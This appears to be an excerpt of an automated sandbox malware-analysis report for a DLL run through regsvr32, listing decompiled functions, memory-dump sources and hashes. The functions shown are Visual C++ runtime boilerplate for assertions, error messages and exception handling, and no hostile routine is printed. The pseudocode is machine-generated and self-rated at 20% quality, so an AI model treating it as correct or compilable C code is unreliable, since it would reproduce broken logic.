				_v212 = 0;
				__imp__RtlCaptureContext();
				_t85 = _v1212;
				_v220 = _t85;
				r8d = 0;
				0x52480e28();
				_v228 = _t85;
				if (_v228 == 0) goto 0x5246bf64;
				_v1516 = 0;
				_v1524 =  &_v1476;
				_v1532 =  &_v1484;
				_v1540 =  &_v1460;
				0x52480e22();
				goto 0x5246bf84;
				_v1212 = _v12;
				_v1308 =  &_v12;
				_v196 = _a4;
				_v192 = _a12;
				_v180 = _v12;
				_v1492 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(??);
				_v212 = UnhandledExceptionFilter(??);
				if (_v212 != 0) goto 0x5246bffb;
				if (_v1492 != 0) goto 0x5246bffb;
				if (_v4 == 0xffffffff) goto 0x5246bffb;
				return E00007FFA7FFA52463280(E00007FFA7FFA52468D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
			}































                                                                                0x7ffa5246be50
                                                                                0x7ffa5246be55
                                                                                0x7ffa5246be59
                                                                                0x7ffa5246be65
                                                                                0x7ffa5246be6f
                                                                                0x7ffa5246be7f
                                                                                0x7ffa5246be88
                                                                                0x7ffa5246be8d
                                                                                0x7ffa5246beaa
                                                                                0x7ffa5246beb4
                                                                                0x7ffa5246bebe
                                                                                0x7ffa5246bec3
                                                                                0x7ffa5246becb
                                                                                0x7ffa5246bedb
                                                                                0x7ffa5246bee1
                                                                                0x7ffa5246bee9
                                                                                0x7ffa5246bef1
                                                                                0x7ffa5246bf04
                                                                                0x7ffa5246bf09
                                                                                0x7ffa5246bf1a
                                                                                0x7ffa5246bf1c
                                                                                0x7ffa5246bf2a
                                                                                0x7ffa5246bf34
                                                                                0x7ffa5246bf3e
                                                                                0x7ffa5246bf5d
                                                                                0x7ffa5246bf62
                                                                                0x7ffa5246bf6c
                                                                                0x7ffa5246bf7c
                                                                                0x7ffa5246bf8b
                                                                                0x7ffa5246bf99
                                                                                0x7ffa5246bfa8
                                                                                0x7ffa5246bfb6
                                                                                0x7ffa5246bfbc
                                                                                0x7ffa5246bfcd
                                                                                0x7ffa5246bfdc
                                                                                0x7ffa5246bfe3
                                                                                0x7ffa5246bfed
                                                                                0x7ffa5246c013

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                                                • Instruction ID: fe5abc9e94b0ada49c476ec2a3438ccbd446836a4771e7d60873314bebbb7d6c
                                                                                • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                                                • Instruction Fuzzy Hash: BD41CE32518BC09AE670CB14F8443ABB3A5FB89355F54522AD68D82BA8EF7DD095CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52468900 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                • String ID:
                                                                                • API String ID: 1445889803-0
                                                                                • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                                                • Instruction ID: ab03262765b84c2984aa44db1262b85f8d327d3f0a30ceb52ff4feb638ab7eff
                                                                                • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                                                • Instruction Fuzzy Hash: 2221E621619F0596DA70CB05FC5422A77E0FB8EBA4F581235EA9D83768EE7CD2948B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246F7F1 Relevance: 79.1, APIs: 23, Strings: 22, Instructions: 376COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                                                                • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                                                                • API String ID: 242677333-579931786
                                                                                • Opcode ID: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                                                • Instruction ID: 53818dc8147dde87f9ada6454bf7c2ae980e55e18eadcbaa051399b7efb2184e
                                                                                • Opcode Fuzzy Hash: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                                                • Instruction Fuzzy Hash: 21320831918A8695E730CB10EC543EE73B1FB86345F888136D69D46AADDFBCE549CB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246B470 Relevance: 40.5, APIs: 7, Strings: 16, Instructions: 260COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invoke_watson_if_error$FileModuleName
                                                                                • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                                                • API String ID: 1949418964-1840610800
                                                                                • Opcode ID: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                                                • Instruction ID: 89b674271132f6979c2a2596a2cf89858bbc84437daf96a5d449068cbd9d708c
                                                                                • Opcode Fuzzy Hash: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                                                • Instruction Fuzzy Hash: E8F1E631518BC694E7348B50E8443AAB3F4FB89780F588135DA9D42BADEFBCE245CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246AE40 Relevance: 38.7, APIs: 5, Strings: 17, Instructions: 207COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invoke_watson_if_error$_invalid_parameter
                                                                                • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                                                                • API String ID: 2356156361-2279852085
                                                                                • Opcode ID: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                                                • Instruction ID: 79415a2073d48b77467c832ce25e931d28796ced32bd5d90067ecd8b6adf061f
                                                                                • Opcode Fuzzy Hash: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                                                • Instruction Fuzzy Hash: 9EC1F672518AC695EB348B11E8803EA77F0FB8A380F548136D69D42BADDFBCE155CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5246CB4F Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 174fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandleWrite
                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                                                                • API String ID: 3320372497-2837547082
                                                                                • Opcode ID: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                                                • Instruction ID: 0de45e4e75247185cc164d85a240ee1bc813713ec0713958bec889b57fe0c377
                                                                                • Opcode Fuzzy Hash: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                                                • Instruction Fuzzy Hash: 3D918332A1C68295EB60DB14E8583BA63F0FB86744F888136D69D436ADDFBCE145CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52470CC0 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 140libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                • API String ID: 2256938910-232180764
                                                                                • Opcode ID: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                                                • Instruction ID: 6c72bd837ae187ea32b7a709cb85caa490c6a04e90f031a1034bc8e7f37d6b9e
                                                                                • Opcode Fuzzy Hash: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                                                • Instruction Fuzzy Hash: BD81D931929B8296E650DB15FC4436A73F0FB86B44F589035DAAE426ACDFBCE449CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524776C0 Relevance: 33.3, APIs: 22, Instructions: 322COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                                                                • String ID:
                                                                                • API String ID: 641786319-0
                                                                                • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                                                • Instruction ID: 52180c2624b01c5ba5890315780781d510389b16c5b64587b8f9110e668b9b8a
                                                                                • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                                                • Instruction Fuzzy Hash: C102E73260CA8581E7609B15E8503ABB7B0FBC6760F588235E6AD47BE9DFBCD445CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA524740B0 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 341COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 20%
                                                                                			E00007FFA7FFA524740B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
				long long _v24;
				long long _v32;
				char _v56;
				long long _v64;
				long long _v72;
				char _v80;
				void* _v88;
				void* _v96;
				intOrPtr _v104;
				void* _v112;
				intOrPtr _v120;
				void* _v128;
				char _v132;
				char _v136;
				long long _v144;
				signed int _v152;
				char _v160;
				signed char _v164;
				signed int _v168;
				char _v176;
				char _v184;
				long long _v192;
				signed char _v200;
				long long _v208;
				signed int _v216;
				signed int _v224;
				long long _v232;
				void* _t222;
				void* _t244;
				void* _t295;
				long long _t302;
				long long _t303;
				intOrPtr _t311;
				long long _t312;
				long long _t321;
				intOrPtr _t325;
				long long _t329;
				long long _t330;
				long long _t332;

				_t295 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v164 = 0;
				_v152 = 0;
				_v168 = E00007FFA7FFA52473B40(_a40, _a32);
				E00007FFA7FFA5246E500(_a16, _a32, _a40,  &_v160);
				if (_v168 - E00007FFA7FFA52473C70(_t295, _a16, _a32, _a40) <= 0) goto 0x52474176;
				r9d = _v168;
				E00007FFA7FFA52473BD0(_t217,  &_v160, _a32, _a40);
				r9d = _v168;
				E00007FFA7FFA52473C00(_v168 - E00007FFA7FFA52473C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
				goto 0x52474197;
				_v168 = E00007FFA7FFA52473C70(_t295, _a16, _a32, _a40);
				if (_v168 - 0xffffffff < 0) goto 0x524741b1;
				if (_v168 - _a40[1] >= 0) goto 0x524741b1;
				goto 0x524741b6;
				_t222 = E00007FFA7FFA5246CF80(_a40);
				if ( *_a8 != 0xe06d7363) goto 0x52474398;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0x52474398;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0x52474213;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0x52474213;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0x52474398;
				_t302 = _a8;
				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0x52474398;
				0x52464000();
				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0x5247423a;
				goto 0x52474862;
				0x52464000();
				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
				_a8 = _t303;
				0x52464000();
				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
				_v164 = 1;
				E00007FFA7FFA5246E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
				if (E00007FFA7FFA5247D2C0(1, _a8) == 0) goto 0x52474290;
				goto 0x52474295;
				E00007FFA7FFA5246CF80(_a8);
				if ( *_a8 != 0xe06d7363) goto 0x524742fa;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0x524742fa;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0x524742e6;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0x524742e6;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0x524742fa;
				_t311 = _a8;
				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0x524742fa;
				E00007FFA7FFA5246CF80(_t311);
				0x52464000();
				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0x52474398;
				0x52464000();
				_t312 =  *((intOrPtr*)(_t311 + 0x108));
				_v144 = _t312;
				0x52464000();
				 *((long long*)(_t312 + 0x108)) = 0;
				if ((E00007FFA7FFA52475BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0x52474349;
				goto 0x52474398;
				if ((E00007FFA7FFA52475CC0(_v144) & 0x000000ff) == 0) goto 0x52474393;
				E00007FFA7FFA52475AB0(1, _a8);
				E00007FFA7FFA52474870( &_v56, "bad exception");
				E00007FFA7FFA5247D320(__edi, __esi, __esp,  &_v56, 0x5248a180);
				goto 0x52474398;
				E00007FFA7FFA5246CF50(_t312);
				if ( *_a8 != 0xe06d7363) goto 0x524747d9;
				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0x524747d9;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0x524743f5;
				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0x524743f5;
				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0x524747d9;
				if (_a40[3] <= 0) goto 0x5247466c;
				_v216 = _a32;
				_v224 =  &_v132;
				_t321 =  &_v136;
				_v232 = _t321;
				r9d = _v168;
				r8d = _a56;
				E00007FFA7FFA5246EA30(_a16, _a40);
				_v128 = _t321;
				goto 0x5247447e;
				_v136 = _v136 + 1;
				_v128 = _v128 + 0x14;
				if (_v136 - _v132 >= 0) goto 0x5247466c;
				if ( *_v128 - _v168 > 0) goto 0x524744b3;
				_t325 = _v128;
				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0x524744b5;
				goto 0x5247445a;
				E00007FFA7FFA5246E680( *((intOrPtr*)(_t325 + 4)), _t325);
				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
				_v120 =  *((intOrPtr*)(_v128 + 0xc));
				_v120 = _v120 - 1;
				_t329 = _v112 + 0x14;
				_v112 = _t329;
				if (_v120 <= 0) goto 0x52474667;
				_t244 = E00007FFA7FFA5246E6A0(_v120 - 1, _t329);
				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
				_v96 = _t330;
				E00007FFA7FFA5246E6A0(_t244, _t330);
				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
				goto 0x5247457e;
				_v104 = _v104 - 1;
				_t332 = _v96 + 4;
				_v96 = _t332;
				if (_v104 <= 0) goto 0x52474662;
				E00007FFA7FFA5246E6A0(_v104 - 1, _t332);
				_v88 = _t332 +  *_v96;
				if (E00007FFA7FFA52474CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0x524745ce;
				goto 0x5247455a;
				_v152 = 1;
				_v176 = _a48 & 0x000000ff;
				_v184 = _v164 & 0x000000ff;
				_v192 = _a64;
				_v200 = _a56;
				_v208 = _v128;
				_v216 = _v88;
				_v224 = _v112;
				_v232 = _a40;
				E00007FFA7FFA52475180(__edi, __esi, __esp, E00007FFA7FFA52474CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
				goto 0x52474667;
				goto 0x5247455a;
				goto L1;
				goto 0x5247445a;
				__eax = _v152 & 0x000000ff;
				__eflags = _v152 & 0x000000ff;
				if ((_v152 & 0x000000ff) != 0) goto 0x524747d7;
				__rax = _a40;
				__eax =  *_a40;
				__eax =  *_a40 & 0x1fffffff;
				__eflags = __eax - 0x19930521;
				if (__eax - 0x19930521 < 0) goto 0x524747d7;
				__rax = _a40;
				__eflags =  *(__rax + 0x20);
				if ( *(__rax + 0x20) == 0) goto 0x524746bf;
				__eax = E00007FFA7FFA5246E680(__eax, __rax);
				_a40 = _a40[8];
				_v32 = __rax;
				goto 0x524746cb;
				_v32 = 0;
				__eflags = _v32;
				if (_v32 == 0) goto 0x524747d7;
				__rax = _a40;
				__eflags =  *(__rax + 0x20);
				if ( *(__rax + 0x20) == 0) goto 0x52474706;
				__eax = E00007FFA7FFA5246E680(__eax, __rax);
				_a40 = _a40[8];
				__rax = __rax + _a40[8];
				_v24 = __rax;
				goto 0x52474712;
				_v24 = 0;
				__rdx = _v24;
				__rcx = _a8;
				E00007FFA7FFA52475BB0(__rax, _a8, _v24) = __al & 0x000000ff;
				__eflags = __al & 0x000000ff;
				if ((__al & 0x000000ff) != 0) goto 0x524747d7;
				__rax = _a16;
				_v64 = _a16;
				__r9 =  &_v80;
				__r8 = _a40;
				__rdx = _a32;
				__rcx = _a16;
				__eax = E00007FFA7FFA5246E500(_a16, _a32, _a40,  &_v80);
				_v64 = __rax;
				_v72 = 0;
				__eax = _a48 & 0x000000ff;
				_v200 = __al;
				__rax = _a32;
				_v208 = _a32;
				__rax = _a40;
				_v216 = _a40;
				_v224 = 0xffffffff;
				_v232 = 0;
				__r9 = _v64;
				__r8 = _a24;
				__rdx = _a8;
				__rcx = _a16;
				__eax = E00007FFA7FFA5246EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
				goto 0x5247484c;
				__rax = _a40;
				__eflags =  *(__rax + 0xc);
				if ( *(__rax + 0xc) <= 0) goto 0x5247484c;
				__eax = _a48 & 0x000000ff;
				__eflags = _a48 & 0x000000ff;
				if ((_a48 & 0x000000ff) != 0) goto 0x52474847;
				__rax = _a64;
				_v208 = _a64;
				__eax = _a56;
				_v216 = _a56;
				__eax = _v168;
				_v224 = _v168;
				__rax = _a40;
				_v232 = _a40;
				__r9 = _a32;
				__r8 = _a24;
				__rdx = _a16;
				__rcx = _a8;
				__eax = E00007FFA7FFA52474960(__ecx, _a8, _a16, _a24, _a32);
				goto 0x5247484c;
				__eax = E00007FFA7FFA5246CF50(__rax);
				0x52464000();
				__eflags =  *((long long*)(__rax + 0x108));
				if ( *((long long*)(__rax + 0x108)) != 0) goto 0x5247485d;
				goto 0x52474862;
				return E00007FFA7FFA5246CF80(__rax);
			}










































                                                                                0x7ffa524740b0
                                                                                0x7ffa524740b0
                                                                                0x7ffa524740b5
                                                                                0x7ffa524740ba
                                                                                0x7ffa524740bf
                                                                                0x7ffa524740cb
                                                                                0x7ffa524740d0
                                                                                0x7ffa524740ea
                                                                                0x7ffa5247410b
                                                                                0x7ffa52474131
                                                                                0x7ffa52474133
                                                                                0x7ffa5247414d
                                                                                0x7ffa52474152
                                                                                0x7ffa5247416f
                                                                                0x7ffa52474174
                                                                                0x7ffa52474193
                                                                                0x7ffa5247419c
                                                                                0x7ffa524741ad
                                                                                0x7ffa524741af
                                                                                0x7ffa524741b1
                                                                                0x7ffa524741c4
                                                                                0x7ffa524741d6
                                                                                0x7ffa524741eb
                                                                                0x7ffa524741fc
                                                                                0x7ffa5247420d
                                                                                0x7ffa52474213
                                                                                0x7ffa52474220
                                                                                0x7ffa52474226
                                                                                0x7ffa52474233
                                                                                0x7ffa52474235
                                                                                0x7ffa5247423a
                                                                                0x7ffa5247423f
                                                                                0x7ffa52474246
                                                                                0x7ffa5247424e
                                                                                0x7ffa5247425a
                                                                                0x7ffa52474262
                                                                                0x7ffa52474273
                                                                                0x7ffa5247428c
                                                                                0x7ffa5247428e
                                                                                0x7ffa52474290
                                                                                0x7ffa524742a3
                                                                                0x7ffa524742b1
                                                                                0x7ffa524742c2
                                                                                0x7ffa524742d3
                                                                                0x7ffa524742e4
                                                                                0x7ffa524742e6
                                                                                0x7ffa524742f3
                                                                                0x7ffa524742f5
                                                                                0x7ffa524742fa
                                                                                0x7ffa52474307
                                                                                0x7ffa5247430d
                                                                                0x7ffa52474312
                                                                                0x7ffa52474319
                                                                                0x7ffa5247431e
                                                                                0x7ffa52474323
                                                                                0x7ffa52474345
                                                                                0x7ffa52474347
                                                                                0x7ffa52474358
                                                                                0x7ffa52474364
                                                                                0x7ffa52474378
                                                                                0x7ffa5247438c
                                                                                0x7ffa52474391
                                                                                0x7ffa52474393
                                                                                0x7ffa524743a6
